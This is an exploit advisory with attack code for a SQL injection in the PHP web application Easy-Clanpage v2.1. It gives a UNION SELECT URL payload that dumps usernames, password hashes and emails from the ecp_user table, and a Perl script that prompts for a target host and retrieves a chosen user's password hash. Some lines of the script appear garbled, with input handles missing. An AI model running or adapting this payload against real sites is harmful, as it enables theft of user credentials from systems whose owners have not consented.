----------------------------Information------------------------------------------------ +Name : Easy-Clanpage <= v2.1 SQL Injection Exploit +Autor : Easy Laster +Date : 30.03.2010 +Script Easy-Clanpage <= v2.1 +Demo : http://cowas-clan.de +Download : Update Version 2.01->2.1 http://www.easy-clanpage.de /?section=downloads&action=viewdl&id=16 +Price : for free +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/Easy-Clanpage/?section=gallery&action=kate&id= #SQL Injection +Exploitable : http://www.site.com/Easy-Clanpage/?section=gallery&action=kate&id=1 +union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+ecp_user +where+userid=1-- ----------------------------------------------------------------------------------------- +Exploit #!usr\bin\perl # # ################################################## # Modules # #------------------------------------------------# use strict; # Better coding. # use warnings; # Useful warnings. # use LWP::Simple; # procedureal interface# ################################################## print " ################################################## # 4004-Security-Project # ################################################## # Easy-Clanpage <= v2.1 SQL Injection # # Exploit # # Using Host+Path+Userid # # www.demo.de /easyclanpage/ 1 # # Easy Laster # ################################################## \a\n"; my($host,$path,$userid,$request); my($first,$block,$error,$dir); $block = " ##################################################\n"; $error = "Exploit failed"; print "$block"; print q(Target www.demo.de->); chomp($host =); if ($host eq""){ die "$error\a\n"}; print "$block"; print q(Path /path/ ->); chomp($path =); if ($path eq""){ die "$error\a\n";} print "$block"; print q(userid->); chomp($userid =); if ($userid eq""){ die "$error\a\n";} print "$block"; $dir = "?section=gallery&action=kate&id="; print "<~> Exploiting...\n"; $host = "http://".$host.$path; print "<~> Connecting...\n"; $request = get($host.$dir."1+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,password),4,5,6,7+from+ecp_user+where+userid=".$userid."--"); $first = rindex($request,"#####"); if ($first != -1) { print "<~> Exploiting...\n"; print "$block\n"; $request = substr($request, $first+5, 32); print "<~> Hash = $request\n\r\n\a"; } else { print "<~> $error"; }